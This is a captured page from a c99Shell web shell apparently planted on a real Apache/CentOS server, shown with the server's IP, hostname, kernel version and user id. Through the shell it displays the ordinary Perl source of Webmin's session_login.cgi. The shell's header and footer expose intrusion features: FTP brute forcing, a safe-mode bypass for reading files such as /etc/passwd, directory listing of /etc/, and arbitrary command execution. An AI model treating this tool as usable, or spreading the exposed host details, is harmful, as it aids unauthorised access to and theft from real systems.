110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/libexec/webmin/ drwxr-xr-x Free 50.63 GB of 127.8 GB (39.61%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


#!/usr/bin/perl
# session_login.cgi
# Display the login form used in session login mode

BEGIN { push(@INC, ".."); };
use WebminCore;

$pragma_no_cache = 1;
#$ENV{'MINISERV_INTERNAL'} || die "Can only be called by miniserv.pl";
&init_config();
&ReadParse();
if ($gconfig{'loginbanner'} && $ENV{'HTTP_COOKIE'} !~ /banner=1/ &&
    !$in{'logout'} && !$in{'failed'} && !$in{'timed_out'}) {
    # Show pre-login HTML page
    print "Set-Cookie: banner=1; path=/\r\n";
    &PrintHeader();
    $url = $in{'page'};
    open(BANNER, $gconfig{'loginbanner'});
    while(<BANNER>) {
        s/LOGINURL/$url/g;
        print;
        }
    close(BANNER);
    return;
    }
$sec = uc($ENV{'HTTPS'}) eq 'ON' ? "; secure" : "";
&get_miniserv_config(\%miniserv);
$sidname = $miniserv{'sidname'} || "sid";
print "Set-Cookie: banner=0; path=/$sec\r\n" if ($gconfig{'loginbanner'});
print "Set-Cookie: $sidname=x; path=/$sec\r\n" if ($in{'logout'});
print "Set-Cookie: testing=1; path=/$sec\r\n";
$title = $text{'session_header'};
if ($gconfig{'showhost'}) {
        $title = &get_display_hostname()." : ".$title;
    }
&ui_print_unbuffered_header(
    undef, undef, undef, undef, undef, 1, 1, undef,
    "<title>$title</title>",
    "onLoad='document.forms[0].pass.value = \"\"; ".
    "document.forms[0].user.focus()'");

if ($tconfig{'inframe'}) {
    # Framed themes lose original page
    $in{'page'} = "/";
    }

print "<center>\n";
if (defined($in{'failed'})) {
    print "<h3>$text{'session_failed'}</h3><p>\n";
    }
elsif ($in{'logout'}) {
    print "<h3>$text{'session_logout'}</h3><p>\n";
    }
elsif ($in{'timed_out'}) {
    print "<h3>",&text('session_timed_out', int($in{'timed_out'}/60)),"</h3><p>\n";
    }
print "$text{'session_prefix'}\n";

print &ui_form_start("$gconfig{'webprefix'}/session_login.cgi", "post");
print &ui_hidden("page", $in{'page'});
print &ui_table_start($text{'session_header'},
              "width=40% class='loginform'", 2);

# Login message
if ($gconfig{'realname'}) {
    $host = &get_display_hostname();
    }
else {
    $host = $ENV{'HTTP_HOST'};
    $host =~ s/:\d+//g;
    $host = &html_escape($host);
    }
print &ui_table_row(undef,
      &text($gconfig{'nohostname'} ? 'session_mesg2' : 'session_mesg',
        "<tt>$host</tt>"), 2, [ "align=center", "align=center" ]);

# Username and password
$tags = $gconfig{'noremember'} ? "autocomplete=off" : "";
print &ui_table_row($text{'session_user'},
    &ui_textbox("user", $in{'failed'}, 20, 0, undef, $tags));
print &ui_table_row($text{'session_pass'},
    &ui_password("pass", undef, 20, 0, undef, $tags));
if (!$gconfig{'noremember'}) {
    print &ui_table_row(" ",
        &ui_checkbox("save", 1, $text{'session_save'}, 0));
    }

print &ui_table_end(),"\n";
print &ui_submit($text{'session_login'});
print &ui_reset($text{'session_clear'});
print &ui_form_end();
print "</center>\n";

print "$text{'session_postfix'}\n";

# Output frame-detection Javascript, if theme uses frames
if ($tconfig{'inframe'}) {
    print <<EOF;
<script>
if (window != window.top) {
    window.top.location = window.location;
    }
</script>
EOF
    }

&ui_print_footer();

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: